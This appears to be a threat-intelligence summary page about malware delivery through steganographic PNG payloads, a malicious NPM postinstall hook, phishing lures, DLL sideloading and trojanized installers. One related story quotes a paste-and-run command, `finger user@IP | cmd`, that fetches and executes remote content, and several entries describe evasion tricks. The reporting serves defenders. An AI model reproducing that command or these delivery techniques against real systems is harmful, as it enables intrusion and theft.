Malware Delivery via Image-Based Payload Hiding and Reused Steganographic Media
Security researchers reported multiple malware delivery chains that hide or embed executable payloads inside image files to evade detection. Veracode analyzed a malicious typosquatted NPM package, buildrunner-dev, that uses a postinstall hook to run init.js, which downloads an obfuscated batch script (packageloader.bat) from a Codeberg repository. The batch script ultimately retrieves PNG images hosted on a free image service and extracts hidden data from RGB pixel values (steganography), leading to a loader with process hollowing, encrypted payload handling, AMSI bypass, and per-AV evasion logic, culminating in deployment of the Pulsar .NET RAT.
Separately, SANS ISC documented a phishing/malspam-style infection chain starting from an Excel attachment exploiting CVE-2017-11882 (Equation Editor), which downloads an HTA that launches PowerShell to fetch a PNG (optimized_MSI.png) containing a Base64-encoded .NET payload delimited by BaseStart- and -BaseEnd tags. The handler noted reuse of the same image across campaigns, used VirusTotal similarity searches to identify many related samples, and produced a YARA rule to track the technique. Kaspersky’s write-up on Arkanix Stealer describes a MaaS stealer ecosystem (C++ and Python variants, ChromElevator usage, and broad credential/crypto theft) but does not center on image-based payload hiding, making it a separate topic from the image-steganography delivery chains described by Veracode and SANS ISC.
Related Entities
Malware
Organizations
Affected Products
Sources
Related Stories
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago
Malware Delivery via Deceptive Distribution and Evasion Techniques
Threat researchers reported multiple active campaigns focused on **stealthy malware delivery** by abusing trusted execution paths and deceptive distribution. Trellix described attackers using **DLL side-loading** against a legitimate, signed `ahost.exe` binary associated with the *c-ares* ecosystem (commonly seen with GitKraken Desktop) by placing a malicious `libcares-2.dll` alongside the executable to trigger search-order hijacking and execute attacker code. The activity was linked to delivery of commodity malware families including **Agent Tesla, Formbook, Remcos RAT, Quasar RAT, DCRat, XWorm, Vidar Stealer, Lumma Stealer, CryptBot**, and others, with targeting observed across business functions (finance, procurement, supply chain, administration) and lures in multiple languages, suggesting regionally focused operations. Separately, Malwarebytes documented a **fake RustDesk download site** (`rustdesk[.]work`) that installs legitimate RustDesk while silently deploying a persistent backdoor framework (**Winos4.0**) via a trojanized installer (e.g., `rustdesk-1.4.4-x86_64.exe`), relying on user deception rather than exploiting a software vulnerability. Sucuri detailed a WordPress compromise where attackers modified `index.php` to perform **selective content injection/SEO cloaking**, using IP-verified logic with hardcoded **Google ASN CIDR ranges** to serve malicious content to Googlebot while showing normal content to human visitors and site owners—an evasion technique that can facilitate downstream malware distribution while reducing the chance of detection.
2 months ago
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
1 months ago